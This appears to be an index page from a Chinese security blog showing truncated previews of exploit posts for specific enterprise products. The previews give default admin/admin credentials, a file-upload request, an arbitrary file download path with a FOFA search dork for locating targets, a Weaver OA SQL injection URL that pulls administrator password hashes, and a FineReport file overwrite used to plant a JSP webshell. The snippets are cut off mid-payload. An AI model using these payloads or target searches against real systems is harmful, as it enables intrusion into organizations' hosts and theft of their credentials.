描述
金山 V8 终端安全系统 存在默认弱口令,攻击者可以获得全部主机权限
POC & 利用
默认口令为 admin/admin
转载请注明:Adminxe's Blog » 金山 V8 终端安全系统_弱口令漏洞...
4年前 (2021-04-17) 2386℃ 0评论
7喜欢
描述
存在某接口可被攻击者利用上传文件
利用
上传
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10...
4年前 (2021-04-17) 2186℃ 0评论
6喜欢
描述
系统存在弱口令和任意文件下载漏洞
fofa “深圳银澎云计算有限公司”
POC & EXP
# 弱口令
admin/admin
任意文件下载
/register/toDownload.do?fileName=敏感...
4年前 (2021-04-17) 5210℃ 0评论
8喜欢
1、泛微OA V8 SQL注入
描述
可以通过漏洞获取到系统管理员加密的(MD5)的密码值
利用(payload)
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%...
4年前 (2021-04-17) 4528℃ 0评论
6喜欢
描述
此漏洞是任意文件覆盖,上传JSP马,需要找已存在的 jsp 文件进行覆盖Tomcat 启动帆软后默认存在的JSP文件
影响版本
FineReportV9
漏洞详情
版本:/tomcat-7.0.96/webapps/ROOT/inde...
4年前 (2021-04-17) 5514℃ 0评论
8喜欢
